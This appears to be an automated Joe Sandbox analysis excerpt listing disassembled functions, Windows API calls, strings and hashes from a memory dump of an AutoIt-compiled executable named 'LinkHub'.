GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B03368,?), ref: 00B033BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B03368,?), ref: 00B033CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00BD2418,00BD2400,?,?,?,?,?,?,00B03368,?), ref: 00B0343A

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

Part of subcall function 00B0425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B03462,00BD2418,?,?,?,?,?,?,?,00B03368,?), ref: 00B042A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00BD2418,?,?,?,?,?,?,?,00B03368,?), ref: 00B034BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B43CB0
SetCurrentDirectoryW.KERNEL32(?,00BD2418,?,?,?,?,?,?,?,00B03368,?), ref: 00B43CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BC31F4,00BD2418,?,?,?,?,?,?,?,00B03368), ref: 00B43D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B43D81

Part of subcall function 00B034D3: GetSysColorBrush.USER32(0000000F), ref: 00B034DE
Part of subcall function 00B034D3: LoadCursorW.USER32(00000000,00007F00), ref: 00B034ED
Part of subcall function 00B034D3: LoadIconW.USER32(00000063), ref: 00B03503
Part of subcall function 00B034D3: LoadIconW.USER32(000000A4), ref: 00B03515
Part of subcall function 00B034D3: LoadIconW.USER32(000000A2), ref: 00B03527
Part of subcall function 00B034D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B0353F
Part of subcall function 00B034D3: RegisterClassExW.USER32(?), ref: 00B03590

Part of subcall function 00B035B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B035E1
Part of subcall function 00B035B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B03602
Part of subcall function 00B035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B03368,?), ref: 00B03616
Part of subcall function 00B035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B03368,?), ref: 00B0361F

Part of subcall function 00B0396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B03A3C

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B43CAA
runas, xrefs: 00B43D75
AutoIt, xrefs: 00B43CA5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 1a7c991bc08353c8060b268b9199eee1e95068a580d5586da270db92065de1d3
Instruction ID: 3050693bd7904a9650b51c9c7acf6040f98eedcf7088219187ac902b96d46461
Opcode Fuzzy Hash: 1a7c991bc08353c8060b268b9199eee1e95068a580d5586da270db92065de1d3
Instruction Fuzzy Hash: 435104711083806EC705EF60DD56D6EBFE89FA4B40F0404AEF581572E2EF648A49DB22

Function 00B6DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B6DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00B6DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00B6DDDA
CloseHandle.KERNELBASE(00000000), ref: 00B6DE87

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 74b3d35c8431dd0e81bcebb23196a952db3839b343fbe35c6b5704e5da66ff07
Instruction ID: 18cffec0ac37316cdc04a627478e1a6892c3bb29696ac1e92532b3e77927c686
Opcode Fuzzy Hash: 74b3d35c8431dd0e81bcebb23196a952db3839b343fbe35c6b5704e5da66ff07
Instruction Fuzzy Hash: F83191725083019FD710EF54C885EAFBBE8EF99340F54096DF581871A1DF729945CB92

Function 00B25058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00B2502E,00000003,00BC98D8,0000000C,00B25185,00000003,00000002,00000000,?,00B32C59,00000003), ref: 00B25079
TerminateProcess.KERNEL32(00000000,?,00B2502E,00000003,00BC98D8,0000000C,00B25185,00000003,00000002,00000000,?,00B32C59,00000003), ref: 00B25080
ExitProcess.KERNEL32 ref: 00B25092

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 905f96e4e41f9d8910dbdb15098e8b1681b7c2bb1ed138b10a07bbf762d7e74d
Instruction ID: 1fab967ec16f72f3a19e7f922e233c4691e912bce2b991379a1f8899605521af
Opcode Fuzzy Hash: 905f96e4e41f9d8910dbdb15098e8b1681b7c2bb1ed138b10a07bbf762d7e74d
Instruction Fuzzy Hash: E4E04632000518AFCF216FA1EE08E8A3BA9EB10382F104454F8099B122DB35DD42CAC0

Function 00B0EE30 Relevance: 21.6, APIs: 14, Instructions: 630windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B0EF07
timeGetTime.WINMM ref: 00B0F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0F228
TranslateMessage.USER32(?), ref: 00B0F27B
DispatchMessageW.USER32(?), ref: 00B0F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0F29F
Sleep.KERNEL32(0000000A), ref: 00B0F2B1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 60b99779f3ef675a22aa78755b5260bfb988df8d6a1627e1adf7a35eb7c05ab5
Instruction ID: c6d189400e92297204d58aafc5ebd53e150602365e6e4d0af4bef916eb22a84b
Opcode Fuzzy Hash: 60b99779f3ef675a22aa78755b5260bfb988df8d6a1627e1adf7a35eb7c05ab5
Instruction Fuzzy Hash: A042DF30604642DFD734CF24C884B7ABBE5FB91705F1485EAE965876D1DB71E888CB82

Function 00B03624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B03657
RegisterClassExW.USER32(00000030), ref: 00B03681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B03692
InitCommonControlsEx.COMCTL32(?), ref: 00B036AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B036BF
LoadIconW.USER32(000000A9), ref: 00B036D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B036E4

Strings

0, xrefs: 00B03639
TaskbarCreated, xrefs: 00B03687
+, xrefs: 00B03640
AutoIt v3 GUI, xrefs: 00B03673

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e041ac3e71b5bf434af478be9fe10ec878a69a7f8f0c999f37e57acdcd599426
Instruction ID: b81b9d7a0b42b4f75761969a728b14245a08f43efeae73891545f527424390c1
Opcode Fuzzy Hash: e041ac3e71b5bf434af478be9fe10ec878a69a7f8f0c999f37e57acdcd599426
Instruction Fuzzy Hash: 5021C0B5D02258AFDB00DFE5E999B9DBBB4FB18710F00412BF611A72A0EBB945448F94

Function 00B409DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B4071A: CreateFileW.KERNELBASE(00000000,00000000,?,00B40A84,?,?,00000000,?,00B40A84,00000000,0000000C), ref: 00B40737

GetLastError.KERNEL32 ref: 00B40AEF
__dosmaperr.LIBCMT ref: 00B40AF6
GetFileType.KERNELBASE(00000000), ref: 00B40B02
GetLastError.KERNEL32 ref: 00B40B0C
__dosmaperr.LIBCMT ref: 00B40B15
CloseHandle.KERNEL32(00000000), ref: 00B40B35
CloseHandle.KERNEL32(?), ref: 00B40C7F
GetLastError.KERNEL32 ref: 00B40CB1
__dosmaperr.LIBCMT ref: 00B40CB8

Strings

H, xrefs: 00B40C3D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 2598443ce1a483efe6faf4ab0a2f7202b2f002c58545ebdccfb32b13c9b39dc0
Instruction ID: 0824b49b51977837737f4a7d11f40d78212a5b5d72dcd2cdb71d3426ed6bdf1a
Opcode Fuzzy Hash: 2598443ce1a483efe6faf4ab0a2f7202b2f002c58545ebdccfb32b13c9b39dc0
Instruction Fuzzy Hash: 70A12732A141089FDF19EF68D892BAD7BE0EB06324F140199F911DB3D1DB359E02DB52

Function 00B052A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B05594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B44B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00B055B2

Part of subcall function 00B05238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0525A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B053C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B44BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B44C3E
RegCloseKey.ADVAPI32(?), ref: 00B44C80
_wcslen.LIBCMT ref: 00B44CE7
_wcslen.LIBCMT ref: 00B44CF6

Strings

\Include\, xrefs: 00B05381
\, xrefs: 00B44CFC
Software\AutoIt v3\AutoIt, xrefs: 00B053BA
Include, xrefs: 00B44BF4, 00B44C35

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 5058cb2ea15d338aefb697407160de9e81eccc4f247aedb4de9e9593268562a4
Instruction ID: 30fd92b634ca59c50ac263d27dc07b868f02aecc33f9991c5b53148936e4055b
Opcode Fuzzy Hash: 5058cb2ea15d338aefb697407160de9e81eccc4f247aedb4de9e9593268562a4
Instruction Fuzzy Hash: 9A71BE715063019BC304EF29ED919ABFBE8FF98750F4044AEF045932A2EF718A08CB56

Function 00B034D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B034DE
LoadCursorW.USER32(00000000,00007F00), ref: 00B034ED
LoadIconW.USER32(00000063), ref: 00B03503
LoadIconW.USER32(000000A4), ref: 00B03515
LoadIconW.USER32(000000A2), ref: 00B03527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B0353F
RegisterClassExW.USER32(?), ref: 00B03590

Part of subcall function 00B03624: GetSysColorBrush.USER32(0000000F), ref: 00B03657
Part of subcall function 00B03624: RegisterClassExW.USER32(00000030), ref: 00B03681
Part of subcall function 00B03624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B03692
Part of subcall function 00B03624: InitCommonControlsEx.COMCTL32(?), ref: 00B036AF
Part of subcall function 00B03624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B036BF
Part of subcall function 00B03624: LoadIconW.USER32(000000A9), ref: 00B036D5
Part of subcall function 00B03624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B036E4

Strings

#, xrefs: 00B03566
AutoIt v3, xrefs: 00B0357F
0, xrefs: 00B0355F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a79d5e82368805af683d6495fee279eac383776276834e63ab81db941f466e16
Instruction ID: b47dbc5c3b50031fa4794bf8e3f32077932db117e3b27763f0ca9581a7eb2dae
Opcode Fuzzy Hash: a79d5e82368805af683d6495fee279eac383776276834e63ab81db941f466e16
Instruction Fuzzy Hash: 80214F71D01394AFDB109FA5ED65B99BFF4FB18B60F00011BE604A72A0EBB90944CF98

Function 00B0370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B03709,?,?), ref: 00B03777
KillTimer.USER32(?,00000001,?,?,?,?,?,00B03709,?,?), ref: 00B037A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B037C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B03709,?,?), ref: 00B037D1
CreatePopupMenu.USER32 ref: 00B037E5
PostQuitMessage.USER32(00000000), ref: 00B03806

Strings

TaskbarCreated, xrefs: 00B037CC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b020904c20bf7890b4959a439528632bcca30735dfe02c4ea3c9fab0886285f3
Instruction ID: b9f36371c3f341272ea0c29d9334acbf6ae75390d50662d911f927c56dc3cc51
Opcode Fuzzy Hash: b020904c20bf7890b4959a439528632bcca30735dfe02c4ea3c9fab0886285f3
Instruction Fuzzy Hash: 4441E2F5140280BFDB142B68DDADF797FEDE714B10F0441A6F502872E1EE689F449662

Function 00B02AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B02AF9
CoUninitialize.COMBASE ref: 00B02B98
UnregisterHotKey.USER32(?), ref: 00B02D7D
DestroyWindow.USER32(?), ref: 00B43A1B
FreeLibrary.KERNEL32(?), ref: 00B43A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B43AAD

Strings

close all, xrefs: 00B02AF4

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e611b599069112273d931f7aca63ad45151df98b47bd3fc646f187c4db9481f9
Instruction ID: 286d56da8d7eb334a2e270aafc762411fe7db03baf5fdae3c3e27de4baa29ab9
Opcode Fuzzy Hash: e611b599069112273d931f7aca63ad45151df98b47bd3fc646f187c4db9481f9
Instruction Fuzzy Hash: 16D14D317412129FDB29EF15C599A69FBE0EF04B10F1542EDE44A6B2A1CB31AE16DF40

Function 00B390C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffa20f19f47a5d7d84c07c2b85ddb113a1cbc9dc4bfeb4ad5cddf47e3e821c7
Instruction ID: 2518b14318b56c7c6c2101facfa6d3595190bd60b2cc015022614c170b046781
Opcode Fuzzy Hash: cffa20f19f47a5d7d84c07c2b85ddb113a1cbc9dc4bfeb4ad5cddf47e3e821c7
Instruction Fuzzy Hash: E0C1B1B1A04249AFDF21DFA8D841BBDBBF4EF09310F2441D9E554A7392C7B09942CB65

Function 00B1AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i, xrefs: 00B1B0A3
d5m0, xrefs: 00B1AE75
d1b, xrefs: 00B1AD55, 00B1AE8E
d0b, xrefs: 00B1AC96, 00B1AD10, 00B1AEA7
d10m0, xrefs: 00B1ACF0
d1r0,2, xrefs: 00B1ACA9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 7f40156b57dd5076650f76dd049210575536cc66e669167d32fd9e67499ece78
Instruction ID: 252993781cea10d69e6d1677f17935b019b2d6ad5f7e2627e4b58d5372e89f56
Opcode Fuzzy Hash: 7f40156b57dd5076650f76dd049210575536cc66e669167d32fd9e67499ece78
Instruction Fuzzy Hash: 6A625771508341DFC724CF25C095AAABBE1FF98304F1489AEE8999B391DB71D949CF82

Function 00B035B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B035E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B03602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B03368,?), ref: 00B03616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B03368,?), ref: 00B0361F

Strings

AutoIt v3, xrefs: 00B035D9, 00B035DE, 00B035DF
edit, xrefs: 00B035FC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 412b703866567f133d95af17f0ac7409e8c487414b610a0300a238afa76c7fd6
Instruction ID: 36b680359c032d942cef29e417a4dba12f83cc7483df617e93e6fc5ef47b8842
Opcode Fuzzy Hash: 412b703866567f133d95af17f0ac7409e8c487414b610a0300a238afa76c7fd6
Instruction Fuzzy Hash: 93F0DA716412D47EEB3557176C18E37BFBDD7D6F60B00002FBA04A7160EA691851DAB8

Function 00B71196 Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B711B3
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00B711EE
EnterCriticalSection.KERNEL32(?), ref: 00B7120A
LeaveCriticalSection.KERNEL32(?), ref: 00B71283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B7129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B712C8

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 50a5823e47fafc4cccb399a7f1a25506647193f7962032e415f44a9d97ff5de3
Instruction ID: 56b7a06fd832ee57c8e06e1522a81ed16984c83815b42fbf88a56379272c54a0
Opcode Fuzzy Hash: 50a5823e47fafc4cccb399a7f1a25506647193f7962032e415f44a9d97ff5de3
Instruction Fuzzy Hash: 0E414A71900214EBDF04AF58DC85AAAB7B8FF44310B1484A5FE04AB296DB30DE61DBA4

Function 00B061A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B45287

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

